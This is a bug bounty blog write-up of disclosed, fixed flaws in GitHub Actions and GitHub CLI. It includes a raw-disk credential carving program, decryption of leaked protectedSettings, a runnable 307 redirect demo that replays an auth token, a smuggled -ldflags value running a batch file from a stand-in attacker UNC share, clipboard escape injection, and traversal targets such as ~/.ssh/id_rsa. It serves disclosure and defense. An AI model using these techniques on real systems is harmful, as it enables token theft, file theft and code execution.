Github bug bounty experiences — Actions and CLI

Imre Rad
Sep 7, 2023 · 9 min read


The Github bug bounty program recently celebrated its 9th birthday, and I decided to try my hand in that space.

Finding #2034215 — Leaked token during image provisioning phase

I started looking into Github Actions first; I wanted to learn more about how jobs are dispatched and how these ephemeral virtual machine instances are isolated. In short, pretty well :) While digging around, I found something interesting though. The disk behind the Actions VM is booted twice. The first phase is called image provisioning mode, and it is only the second boot that actually executes your Action workload. More interestingly, the virtual machines behind these two phases are different: in the first phase, the disk is attached to a VM running in a different security context. Since write operations to the file system (including file removals) are likely recoverable due to the nature of file systems, I started doing file carving, hoping to find something sensitive.

At the same time, by using a .NET decompiler, I looked into the source code of the /opt/runner/provisioner/provisioner executable. I found two interesting files, /data/accesstoken/.accesstoken and /opt/runner/provisioner/.settings, both of which are removed after being read from disk. In other words, image provisioning populates these files, then the 2nd phase picks them up and removes them. The content of the first one was a base64 encoded string, so I didn't have much chance of finding it on a 100+ GB disk, but I was able to recover the second based on some special strings that I knew were present (e.g. AadIssuanceEndpoint). The dirty magic I used was the following shell command:

LANG=C grep --only-matching --byte-offset --ignore-case --binary --text '"protectedSettings"' /dev/root &
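The same carving idea can also be expressed as a small program. Below is a minimal Go sketch doing the equivalent scan (the marker and device path are taken from the command above; the chunk size is arbitrary):

package main

import (
	"bytes"
	"fmt"
	"io"
	"os"
)

func main() {
	marker := []byte(`"protectedSettings"`)

	f, err := os.Open("/dev/root")
	if err != nil {
		panic(err)
	}
	defer f.Close()

	const chunkSize = 4 << 20 // scan the raw device in 4 MiB reads
	chunk := make([]byte, chunkSize)
	tail := []byte{} // carry-over so matches spanning two reads are not missed
	var pos int64    // absolute device offset of the start of the current window

	for {
		n, err := f.Read(chunk)
		if n > 0 {
			window := append(append([]byte{}, tail...), chunk[:n]...)
			from := 0
			for {
				idx := bytes.Index(window[from:], marker)
				if idx < 0 {
					break
				}
				fmt.Printf("hit at byte offset %d\n", pos+int64(from+idx))
				from += idx + 1
			}
			// keep the last len(marker)-1 bytes for the next iteration
			keep := len(marker) - 1
			if keep > len(window) {
				keep = len(window)
			}
			pos += int64(len(window) - keep)
			tail = append(tail[:0], window[len(window)-keep:]...)
		}
		if err == io.EOF {
			break
		}
		if err != nil {
			panic(err)
		}
	}
}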

Then I could finally find the .settings file:

Later on, I was able to extract the same data (and also the .accesstoken) via different means as well, e.g. by dumping the memory of the process itself. (The accesstoken, FTR, seems to be the result of an RSA-2048 operation.) However, this was still within the same security context as the VM itself, so there was no impact.

I was about to give up when I found something interesting again. I noticed that the contents of a system directory were different on about 25% of the hosted runners. The leak could be found in /var/lib/waagent/history:

Sometimes there were 4 zip files (+ the dir):

Sometimes there were only 3 (+ the dir); note that the zip file with : characters in the filename is small (~1k):

And sometimes, like in the example above, the zip file with : characters in the filename contains ExtensionsConfig.2.xml (which contains the protectedSettings for the Azure Custom Script Extension):

In this example, this zip file belonged to an Action runner instance called GHEUS3UB22EUS2C32-0061 (you can find the name in the /data/instancename directory). The zip file there contained a file called ExtensionsConfig.2.xml, which in turn featured the protectedSettings this finding is about. It is encrypted; the corresponding private key was present in /var/lib/waagent (Azure provisioned it in the first stage).

With some openssl and PowerShell sorcery, the clear settings could be recovered:
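As a rough illustration of what that decryption amounts to, here is a hedged Go sketch. It assumes the protectedSettings value is a base64-encoded PKCS#7/CMS envelope encrypted to the certificate that waagent provisioned (the usual packaging for Azure extension protected settings); the input file names are placeholders:

package main

import (
	"crypto"
	"crypto/x509"
	"encoding/base64"
	"encoding/pem"
	"fmt"
	"os"
	"strings"

	"go.mozilla.org/pkcs7" // third-party PKCS#7/CMS implementation
)

func main() {
	// Placeholder inputs: the base64 protectedSettings string lifted from
	// ExtensionsConfig.2.xml plus the certificate/private key pair from /var/lib/waagent.
	b64, err := os.ReadFile("protected_settings.b64")
	check(err)
	envelope, err := base64.StdEncoding.DecodeString(strings.TrimSpace(string(b64)))
	check(err)

	cert := parseCert(pemBytes("waagent.crt")) // placeholder file names
	key := parseKey(pemBytes("waagent.prv"))

	p7, err := pkcs7.Parse(envelope)
	check(err)
	clearText, err := p7.Decrypt(cert, key)
	check(err)
	fmt.Printf("%s\n", clearText)
}

func pemBytes(path string) []byte {
	data, err := os.ReadFile(path)
	check(err)
	block, _ := pem.Decode(data)
	if block == nil {
		panic("no PEM block in " + path)
	}
	return block.Bytes
}

func parseCert(der []byte) *x509.Certificate {
	cert, err := x509.ParseCertificate(der)
	check(err)
	return cert
}

func parseKey(der []byte) crypto.PrivateKey {
	// the key may be PKCS#1 or PKCS#8 encoded; try both
	if k, err := x509.ParsePKCS1PrivateKey(der); err == nil {
		return k
	}
	k, err := x509.ParsePKCS8PrivateKey(der)
	check(err)
	return k
}

func check(err error) {
	if err != nil {
		panic(err)
	}
}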

This allowed me to invoke the machineregister API (adjust mmsghub, pool and instancename in the command based on the json output of the previous command):

As you can see, the token I gained access to belongs to a machine (fv-az313-256) different from the one the attack was started from (GHEUS3UB22EUS2C32-0061); fv-az313-256 was in use during the image provisioning phase. This is proof of crossing a security boundary. While this sounds exciting, (un)fortunately it didn't let me access anything sensitive or make persistent changes to anything (even though the API supported a method with the PATCH verb). I hesitated for a few days about whether to report this or not; then, since it is proof of crossing a security boundary, I decided to file a ticket. It was accepted, fixed and rewarded as a low severity issue. According to their explanation, the token was indeed not able to do much more than what I found.

Github CLI

In the rest of my research, I focused on the official Github CLI; this was a source code review exercise. The PoC scripts can be found here. Github CLI 2.33.0 is the first version that features fixes for all the issues described below.

Finding #2040559 — Github CLI 307

Go's net/http client supports following redirects; this functionality is enabled by default. The client also respects the specification and resends the HTTP request body when it encounters a 307 redirect. Corresponding source code:

https://github.com/golang/go/blob/master/src/net/http/client.go#L511

In the case of the Github CLI, the Authorization header was injected into the HTTP requests by a custom HTTP transport layer. The corresponding source code could be found here:

https://github.com/cli/cli/blob/5e2e818204e346b0c8e5afa1be5ad06159d42d15/api/http_client.go#L90

The combination of these two opens an interesting attack vector where a malicious server interacting with the official Github CLI could return 307 redirects pointing to either api.github.com or another Github Enterprise deployment in order to execute sensitive actions as the victim’s account on Github.com or the 3rd party GHE server.

The attacker has full control over the URL the request is sent to, and partial control over the request body.
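To make the mechanics concrete, here is a minimal, self-contained Go sketch (not the CLI's actual code) combining the two ingredients: a transport that injects the Authorization header into every outgoing request, and a client that follows a 307 from a malicious server and re-sends the request body to the new target. Running it prints the token and the re-sent JSON body as received by the target server.

package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// authTransport mimics the pattern described above: the Authorization header
// is injected at the transport layer, so it is added to every request the
// client sends, including requests issued while following redirects.
type authTransport struct {
	base http.RoundTripper
}

func (t *authTransport) RoundTrip(req *http.Request) (*http.Response, error) {
	req = req.Clone(req.Context())
	req.Header.Set("Authorization", "token SECRET")
	return t.base.RoundTrip(req)
}

func main() {
	// Stand-in for api.github.com: just logs what it receives.
	target := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		body, _ := io.ReadAll(r.Body)
		fmt.Printf("target received %s %s auth=%q body=%q\n",
			r.Method, r.URL.Path, r.Header.Get("Authorization"), body)
	}))
	defer target.Close()

	// Stand-in for the malicious "GHE" server: answers with a 307 pointing at the target.
	evil := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, target.URL+"/repos/victim/repo/pulls/1/merge", http.StatusTemporaryRedirect)
	}))
	defer evil.Close()

	client := &http.Client{Transport: &authTransport{base: http.DefaultTransport}}

	// The client follows the 307 and, per the spec, re-sends the request body;
	// the transport re-attaches the token on the redirected request as well.
	resp, err := client.Post(evil.URL+"/api/v3/anything", "application/json",
		strings.NewReader(`{"merge_method":"merge"}`))
	if err != nil {
		panic(err)
	}
	resp.Body.Close()
}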

The repro steps are:

  • As the attacker, open a Pull request in the victim’s (irsl/pr-test) repository on Github.com and retrieve its ID:
  • As the attacker, start the PoC redirect server:
  • As the victim, send PR approve request to an attacker emulated/controlled Github Enterprise server (gcpexp.duckdns.org here):

The attack is complete: the PR in the victim's repository on Github.com (irsl/pr-test) was merged by the victim unintentionally. Note that neither the name of the repository nor the numeric ID of the pull request matters in the victim's command. The attack could be better weaponized by merging the steps together (so the attacker would open the malicious pull request on the fly).

This submission was rejected due to low impact, but still rewarded. Later on, I noticed it was also fixed. Interesting combo, huh?

The Github security team, while reviewing the draft of this write-up, commented: “…when we close reports as `Resolved` with a note that they do not represent a significant security risk it does not necessarily mean that we do not intend to address the issue outlined in the report. Although not every issue reported to us is of significant enough risk that it aligns with our documented severity scale, we still want to encourage and reward submissions that may fall outside of this scale as those often contribute to our overall defense-in-depth posture.”

Finding #2073472 — Github CLI GH_OAUTH_CLIENT_ID

The primary component of the Github CLI's build tooling is the build.go file, which supports a few environment variables as incoming parameters, including GH_OAUTH_CLIENT_ID/GH_OAUTH_CLIENT_SECRET.

The code populates a string slice and invokes go build to kick off the build process: https://github.com/cli/cli/blob/2a4160a3a38d3c05a1395b32cd422d5fe1a8e92d/script/build.go#L53

This means:

  • no shell interpreter is involved
  • the attacker does not control the command to be executed
  • the attacker cannot add a new parameter (a full item of the argv slice)

Still, Golang's -ldflags parameter allows multiple ways to execute arbitrary helper binaries. On *nix this is limited to files that are already present on the local system, but on Windows, the attacker could execute arbitrary binaries with the help of UNC paths.
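To illustrate the shape of the problem, here is a hedged Go sketch; it is not the actual script/build.go code, the -X target name is a placeholder, and the -linkmode/-extld combination is just one plausible vector:

package main

import (
	"fmt"
	"os"
	"os/exec"
)

func main() {
	// Attacker-influenced in the scenario described above, e.g.:
	//   GH_OAUTH_CLIENT_ID='x -linkmode=external -extld=\\attacker\share\evil.bat'
	clientID := os.Getenv("GH_OAUTH_CLIENT_ID")

	// The value lands inside one argv element, so no shell interpreter runs...
	ldflags := fmt.Sprintf("-X main.oauthClientID=%s", clientID)
	cmd := exec.Command("go", "build", "-ldflags", ldflags, "./cmd/gh")
	cmd.Stdout, cmd.Stderr = os.Stdout, os.Stderr

	// ...but `go build` splits the -ldflags string on whitespace before handing
	// the flags to the linker, so the smuggled -extld names an arbitrary helper
	// binary (a UNC path on Windows) that the toolchain will then execute.
	if err := cmd.Run(); err != nil {
		fmt.Fprintln(os.Stderr, err)
	}
}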

To repro:

Where the content of the batch file could be something like this:

Then kick off the build:

Verify that the proof file indeed shows up.

If these environment variables are ever exposed as parameters of a build job, then users who have permission to trigger it could bypass the code review process and execute arbitrary code as part of the build, potentially allowing them to mount a supply chain attack.

This submission was rejected (“an attacker gaining this permission is outside of our considered threat model”).

Finding #2047239 — Github CLI terminal escape sequences

The Github CLI writes attacker-controlled input to the terminal as output. In most cases, binary characters cannot be present:

gh repo edit -d irsl/test -d "$(printf 'hello \x1B#8 world')" is rejected with “description control characters are not allowed”, and gist filenames/descriptions/content are sanitized so that \x1B is turned into the two printable ASCII bytes \x5E\x5B (^[).

However, gh repo view blindly relays the readme file to the output/terminal. As such, it is vulnerable to terminal escape sequence injection attacks, which may lead to arbitrary command execution on the client/victim side if gh interacts with an attacker-controlled repository (hosted either on Github.com or on an Enterprise deployment).
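The fix essentially boils down to the same treatment the other code paths already apply. A minimal Go sketch (illustrative only, not the CLI's actual implementation) of neutralizing the ESC byte before it reaches the terminal:

package main

import (
	"fmt"
	"strings"
)

// sanitize turns the raw ESC byte into the two printable characters "^[",
// mirroring the treatment described above for gist content.
func sanitize(s string) string {
	return strings.ReplaceAll(s, "\x1b", "^[")
}

func main() {
	readme := "hello \x1b#8 world" // attacker-controlled README content
	fmt.Println(sanitize(readme))  // prints: hello ^[#8 world
}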

If you are unfamiliar with terminal escape sequence attacks, please refer to these great articles:

Some terminals also support setting data to the system clipboard, and some of them have this feature enabled by default. A great summary of this: https://github.com/tmux/tmux/wiki/Clipboard
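For reference, the clipboard write typically happens via the OSC 52 escape sequence; a tiny Go sketch that emits it (whether the terminal honors it depends on the emulator and its configuration):

package main

import (
	"encoding/base64"
	"fmt"
)

func main() {
	// Whatever ends up in the clipboard may later be pasted into a shell by the user.
	payload := "echo pwned\n"
	b64 := base64.StdEncoding.EncodeToString([]byte(payload))
	// OSC 52: ESC ] 52 ; c ; <base64> BEL sets the clipboard/selection in
	// terminals that allow applications to do so.
	fmt.Printf("\x1b]52;c;%s\x07", b64)
}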

The most recent versions of the most popular terminal emulators are patched against attacks that are known to execute commands, but they have a long history of such issues. Also, based on “… depending on terminal, other features such as font size, colors, terminal size, character set, alternate screen buffers and more may be accessible though escapes.” and “xterm, linux console, gnome-terminal, konsole, fbterm, Terminal (Mac OS)… the list of terminal emulators is not so short! And each of them has its own bugs and limitations compared to DEC and ANSI standards.”, I think it is reasonable to assume that there are terminal emulators out there that could be exploited even today, or that new attacks will be identified in the future.

To demonstrate this, I created a repo with a readme that contains the following escape sequence:

ESC # 8 (V) Fill Screen with E’s

This is a live video:

This attack should be compatible with any terminal :)

To demonstrate something more severe as well, let's take a look at the popular screen terminal. Screen has an (undocumented) feature that allows writing and reading the title of the current window, so the classical attack can be mounted to feed an arbitrary string into the terminal's input. There is a limitation I couldn't bypass though: newlines are filtered out, so the user needs to press the Enter key themselves. Since I hide the injected text, I think hitting Enter is a highly likely user reaction.

In order to hide the command to be executed, we push a lot of whitespace to the terminal. And the visuals:

https://youtu.be/tmOif-bwW2A

In short, interacting with an attacker-controlled repo could result in arbitrary command execution. This submission was rewarded and fixed here. Fun fact: I reported effectively the same issue to Google in the context of the gcloud CLI; the submission was accepted, but neither rewarded nor fixed.

Finding #2073425 — Github CLI path traversal file read via issue templates

The Github CLI features per-repo issue templates. They are effectively text files with a special filename under the repository. Both “Legacy” and “NonLegacy” templates are supported. The legacy ones are indexed here:

And read here:

Note that no security measures were present to prevent loading content via a symlink. This allows an attacker to steal sensitive files from a victim who opens an issue in a malicious repository.
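A defensive Go sketch of what refusing symlinked templates can look like (illustrative only, not the CLI's actual fix):

package main

import (
	"fmt"
	"os"
)

// readTemplate Lstat()s the path first and only reads regular files, so a
// template that is actually a symlink (e.g. pointing at ~/.ssh/id_rsa) is rejected.
func readTemplate(path string) ([]byte, error) {
	fi, err := os.Lstat(path)
	if err != nil {
		return nil, err
	}
	if fi.Mode()&os.ModeSymlink != 0 {
		return nil, fmt.Errorf("issue template %q is a symlink, refusing to read it", path)
	}
	if !fi.Mode().IsRegular() {
		return nil, fmt.Errorf("issue template %q is not a regular file", path)
	}
	return os.ReadFile(path)
}

func main() {
	data, err := readTemplate("ISSUE_TEMPLATE")
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Printf("%s", data)
}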

To repro, execute the following commands as the attacker:

Then, as the victim:

Both templates will be offered; instead of the deprecated one, choose the “blank” one:

“Open a blank issue” suggests an empty issue would be opened. Press enter to skip and submit.

At this point, the file pointed to by ISSUE_TEMPLATE has already been uploaded.

Examples of other potential targets (assuming gh repo clone was executed in $HOME):

  • ../../.ssh/id_rsa
  • ../../.config/gh/hosts.yml

This flaw was accepted, rewarded and fixed.

Finding #2037915 — Github CLI path traversal file write via release download

The official Github CLI supports managing releases of Github repositories. It supports Github Enterprise deployments as well; it is not limited to the official Github.com site. The implementation of the asset download command can be found here: https://github.com/cli/cli/blob/trunk/pkg/cmd/release/download/download.go#L286

Note that it supports deriving the destination filename from the Content-Disposition header returned by the server. This header was trusted blindly, so the command was vulnerable to path traversal when the CLI connected to a malicious server. An attacker could download arbitrary data and save it to arbitrary locations on the victim's machine, breaking out of the specified destination directory. A file placed in /etc/cron.d is executed eventually (and there are many other alternatives), so the impact of this path traversal primitive is effectively code execution.
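A defensive Go sketch of how the server-supplied filename can be constrained to the destination directory (illustrative only, not the CLI's actual fix):

package main

import (
	"fmt"
	"mime"
	"path/filepath"
)

// safeDestination derives a destination path for a downloaded asset from the
// server-supplied Content-Disposition header, stripping any directory
// components so the file cannot escape destDir.
func safeDestination(destDir, contentDisposition string) (string, error) {
	_, params, err := mime.ParseMediaType(contentDisposition)
	if err != nil {
		return "", err
	}
	name := filepath.Base(filepath.Clean(params["filename"]))
	if name == "." || name == ".." || name == string(filepath.Separator) {
		return "", fmt.Errorf("suspicious filename in Content-Disposition: %q", params["filename"])
	}
	return filepath.Join(destDir, name), nil
}

func main() {
	// What a malicious server could send:
	hdr := `attachment; filename="../../../../etc/cron.d/evil"`
	fmt.Println(safeDestination("/tmp/d", hdr)) // prints: /tmp/d/evil <nil>
}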

To repro, run the attached Python PoC on a server with proper TLS certificates. Example:

Then simulate the victim session (note the file is written to /tmp/any-filename breaking out of the specified destination dir /tmp/d):

There was a limitation: if the destination file already exists, the CLI refuses to overwrite it and suggests using --clobber.

This vulnerability report was accepted, rewarded and fixed.

Takeaways

My experience with this bug bounty program has been positive so far (reasonably fast response times, fair reward decisions, nice swag). Stay tuned, my next write-up will be about a batch of server-side flaws in Github Enterprise Server :)


Written by Imre Rad

Software developer daytime, security researcher in free time